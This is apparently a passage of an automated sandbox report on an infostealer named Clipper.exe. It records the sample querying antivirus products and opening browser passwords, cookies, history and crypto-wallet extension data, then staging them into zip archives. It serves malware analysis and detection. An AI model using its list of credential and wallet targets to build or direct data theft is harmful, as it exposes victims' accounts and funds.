Source: Web Data.0.dr | Binary or memory strings carrying the suffix "VMware20,11696428655" (trailing bytes omitted): Canara Transaction Password, discord.com, interactivebrokers.co.in, Interactive Brokers - COM.HK, global block list test form, Canara Transaction Password, Interactive Brokers - EU East & Central, Canara Change Transaction Password, account.microsoft.com/profile, secure.bankofamerica.com, www.interactivebrokers.com, Interactive Brokers - GDCDYN, Interactive Brokers - EU West, outlook.office365.com, microsoft.visualstudio.com, Canara Change Transaction Password, outlook.office.com, www.interactivebrokers.co.in, ms.portal.azure.com, AMC password management page, tasks.office.com, Interactive Brokers - NDCDYN, turbotax.intuit.com, interactivebrokers.com, Interactive Brokers - non-EU Europe, dev.azure.com, netportal.hdfcbank.com, Interactive Brokers - HK, bankofamerica.com, trackpan.utiitsl.com, Test URL for global passwords blocklist
Note: Web Data.0.dr is the dropped copy of the Chrome "Web Data" profile database that the sample harvested, so these VMware strings reflect the sandbox's own browser profile rather than VM-detection code in Clipper.exe; treat this block as evidence of browser-data theft, not of evasion.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Clipper.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Clipper.exe | NtReadFile: Indirect: 0x7FF6C66D52C7
Source: C:\Users\user\Desktop\Clipper.exe | NtWriteFile: Indirect: 0x7FF6C66CDB77
Source: C:\Users\user\Desktop\Clipper.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\Clipper.exe VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\CZQKSDDMWR.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.pdf VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.mp3 VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.pdf VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\JDDHMPCDUJ.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\LIJDSFKJZG.mp3 VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.docx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.pdf VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.jpg VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.pdf VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Desktop\ZIPXYXWIOY.mp3 VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.docx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.pdf VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\GRXZDKKVDB.docx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\GRXZDKKVDB.jpg VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\Documents\NVWZAPQSQL.xlsx VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\CreditCards VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\screen1.png VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\sensitive-files.zip VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\user_info.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Chrome_Default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Edge_Default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Clipper.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Electrum\wallets\
Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Clipper.exe, 00000000.00000003.2051601001.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
